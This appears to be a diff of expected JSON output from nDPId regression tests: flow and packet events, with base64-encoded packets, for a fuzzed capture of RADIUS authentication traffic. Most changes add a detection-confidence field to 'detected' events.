+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997655006,"flow_last_seen":1528997655006,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997655006,"l3_proto":"ip4","src_ip":"37.0.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 01263{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":165,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"ts_msec":1528997655347,"pkt":"AAAMB6xAABRP+4rqCABFAALHnfCWAP8RAAAKDEAexuIZPnIQBxQCswAAAV0Cq2pJZM0ruVNMnb6INz7DlDAaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFd2CQlXSVNQUjEwGgkQADghDQM1NwZbIqcXATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceUTAwLWE3KjQyLWQwLWUwQDAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYzUxNmE3MjI1YiwgNWIyMmE3MTYvZjA6Nzk6MjA6ZDE6N2Q6MzcvMjI4JAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkFwEAAAsFAADLaWk9Y3GhxCUALFVq30f3AwIAIPJ2\/3EaFAAAV8gHDlZaV0MyVGVzdEzhYhoKAABXyAgERVQaEAAAV8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoaEQAAV8gRC0x4bmRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAAFfIJQXOelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZBbHVlGh0AADghExc0MC44MDQ4ODJOLTc2LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW26aXJlY3QaDAAABYMHBsB8SplQEpV0+y2O0IA5getcDb\/AJ1c="}
 00201{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":165,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":691}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":166,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997655528,"flow_last_seen":1528997655528,"flow_idle_time":180000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"ts_msec":1528997655528,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00816{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1528997655528,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":318,"pkt_l4_len":284,"ts_msec":1528997655528,"pkt":"ABRP+4rqcNuYZMUnCABFAAEwA5xAAPwRT9bG4hk+CgwlAAcUchB0HNn2Al0BFJBXpcO19tza8j\/VlLjh3P0aCwAAV8gbBVNQQxpuAAABNxA0jONf4TbIHPUvuy933g6GTJqzqlfKJTFZvtaM0NBQo2jkN\/g2tPEp73PKTNfSnSD8j7kRNPVhPusRHPLIHahhhZlLWh2egFea0oaNGerpaQMfhEQ5jMYg8ICzMJVYCSspbKc8\/fk7ATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmcsIjViMjJhNzE2L2YwOjc5OjYwOmQxOjclADM3LzIyOFkMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBIwdD70xCUAoHuVXO\/FXR+q"}
-00626{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997655528,"flow_last_seen":1528997655528,"flow_idle_time":180000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"ts_msec":1528997655528,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997655528,"flow_last_seen":1528997655528,"flow_idle_time":180000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"ts_msec":1528997655528,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 01386{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1528997659285,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"ts_msec":1528997659285,"pkt":"AAAMB6xAABRP+4rqCABFAALbtPFAAP8RAAAKDEAexuIZPnIQBxQCxwAAAV4Cv0qC4LnwI1oT30\/+r6N\/324aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADchDQM1NwZbIqcbMzUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmUxd29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlJQB6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYzUxNmE3MjI1YiwgNWIyMmE3MTYvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjI4BAasFAEQIA5WWldDMlRXc3RMYWIaDHUAN2MBBgD2AAIGBgAAAAIMBgAABRQ9BgAAABNHBgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0Z2FiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAlAMglBVZ6VxoNAAA4IQ4HMDclADEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVASL5LJM0zKVOhBluOjWkW9+A=="}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":168,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997659473,"flow_last_seen":1528997659473,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997659473,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29295,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1528997659473,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"ts_msec":1528997659473,"pkt":"ABRP+4rqcNuYVccnCABFAADhA6lAAPwRUBjG4hk+CgxAHgcUcm8AzZu5C14AxUxI+gXiLIrMuBk\/g\/m1ALsBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE3MTYvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjI4T0oBAgBIFwEAAAEFAACnLVLIF0rTm6KFdNC987pOAgUAAJOGz1Q0xAAAaP51Ml0i0tuLAQACCwUAAGEYnEUncDkjDC3ik4qARkBQEl1GRO63bmbIH3rSxoBwm9k="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":168,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997659473,"flow_last_seen":1528997659473,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997659473,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29295,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":168,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997659473,"flow_last_seen":1528997659473,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997659473,"l3_proto":"ip4","src_ip":"198.226.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29295,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 01358{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1528997659803,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"ts_msec":1528997659803,"pkt":"AAAMB6xAABRP+4rqCABFAALHtPJAAP8RAAAKDEAexuIZPnIQBxQCswAAAV8Cq4u3v\/AI1pCqOyPuExx1k6FwCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM1RQZbIqcbATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jY\/0xMS4zZ3BwbmV0d29yay5vcmdZhhB+CDFjaXNjb4MGJQAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYzUxNmE3MjI1YiwgNWIyMmE3MTYvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjI4BAasFAEQIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABjIAAA1BBgAAAAZRBDU2TyYCAgAkFwEAAAsFAACko3IYMyHHAM47ZS3aaJ9qAwIAIPaHgNUaFAAAV8glAFaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997663786,"flow_last_seen":1528997663786,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997663786,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29304,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01385{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1528997663786,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":745,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":745,"pkt_l4_len":711,"ts_msec":1528997663786,"pkt":"AAAMB6xAABRP+4rqCABFAALbIRJAAP8RAAAKDEAexuIZNXJ4BxQCxwAAAWACvwChXhfZ\/4Ullo9FfFDZMhwaSgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQc2NwZbIqcfATUwMzExNDgwMDczNjM4MDcyQHdsYW74bW5CNDgwLm1jJQAxMS4zZ3BwbmV0dW9yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtN0MtNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjqzAwMDAwYzUxNmE3MjI1YiwgNWIiMmE3MTYvJQA6Nzk6NjA6ZDE6N2Q6MzcvMjI4BAasFAEQIA5WWldDMlRlc3RMYWIaDAgAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQA4ATAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNnCXBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gJClRlc3QgTGFiGgkAAFfIDwMxGgoAAFfIEAROShoRAABXyBElAHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGVzdCBMYWIaCwAAV8hABVZ6VxoNAAA4IQ4HMDcwNzMaDAAAOPYRBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5VxoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAm0VAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVAS63yjoOn5DGF0SWn3Fz+BWg=="}
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997663786,"flow_last_seen":1528997663786,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997663786,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29304,"dst_port":1812,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997663786,"flow_last_seen":1528997663786,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"ts_msec":1528997663786,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29304,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997663992,"flow_last_seen":1528997663992,"flow_idle_time":600000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"flow_avg_l4_payload_len":205,"midstream":0,"ts_msec":1528997663992,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","l4_proto":170,"flow_datalink":1,"flow_max_packets":3}
 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1528997663992,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"ts_msec":1528997663992,"pkt":"ABRP+4rqcNuYVcUnCABFAADhA8JAAPuqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00718{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":174,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"ts_msec":1528997664794,"pkt":"ABRP+4rqcNuYVcUnCABFAAEwJQBAOfwRT6vG4hk1CgxAHgcUchABHPYEAmEBFD8mC375vqLp+KF9uwm3k4gaCwAAV8gbBVNQQxpuAAABNxA07wUYi7+P\/KZsVS9NJaMwCtVJk9jEkC3Vl7jOtDBnuTtoap5IYaKcg6eQ4RJKJBTY9DYRNNB+ybyX+uSA4d1O4JYyTwpoEtUi2e6DQEAJ+nzQSzAvvoa2HSAJtTQFSW0rq69l6fpVATUwMzExNDgwMDcTwDM4MDcyQHdsYW4ubW5jNDjSLm1jYzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhNzE2L2YwOjc5OjYwOmQxOjdkOjM3LzIyOFkMOTA4JQAhMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBJTXIMaNTnLNgc2lqiL9H7Q"}
@@ -281,7 +281,7 @@
 00180{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":175,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997683490,"flow_last_seen":1528997683490,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997683490,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.172.158","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00711{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1528997683490,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"ts_msec":1528997683490,"pkt":"ABRP+4rqcNuYVcUnCABFAADhA\/1AAPsRUM3G4hk1CgysngcUchAAzV+4C2IAxbjeL+gJ\/Z8y3pAVBW+ilI8BNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrTG9yZywgNWIyMmE3MTYvZjA6Nzk6NjA6UjE6NyUAMzcvMjI4T0oBAgBIFwEAAAEFAACeTPrzq4G+qMdV63zS5jgKAgUAANMitQR5aAAATi\/4eqBv42KLAQBzCwUAAI3Vpdgp79asxAN0pnzOl99QEuFioroE6q1umxIDXtaj55s="}
-00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997683490,"flow_last_seen":1528997683490,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997683490,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.172.158","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Radius","breed":"Acceptable","category":"Network"}}
+00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997683490,"flow_last_seen":1528997683490,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997683490,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.172.158","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997683835,"flow_last_seen":1528997683835,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"ts_msec":1528997683835,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.119.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01356{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1528997683835,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"ts_msec":1528997683835,"pkt":"AAAMB6xAABRP+4vqCABFAALHIRVAAP8RAAAKDEAexncZNXIQBxQCswAAAWMCqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":180,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997687969,"flow_last_seen":1528997687969,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1528997687969,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1965,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
@@ -292,30 +292,30 @@
 00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":187,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997105304,"flow_last_seen":1528997105304,"flow_idle_time":600000,"flow_min_l4_payload_len":284,"flow_max_l4_payload_len":284,"flow_tot_l4_payload_len":284,"flow_avg_l4_payload_len":284,"midstream":0,"ts_msec":1528997764712,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","l4_proto":88,"flow_datalink":1,"flow_max_packets":3}
 00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":187,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997109583,"flow_last_seen":1528997109583,"flow_idle_time":600000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":0,"ts_msec":1528997764712,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":254,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
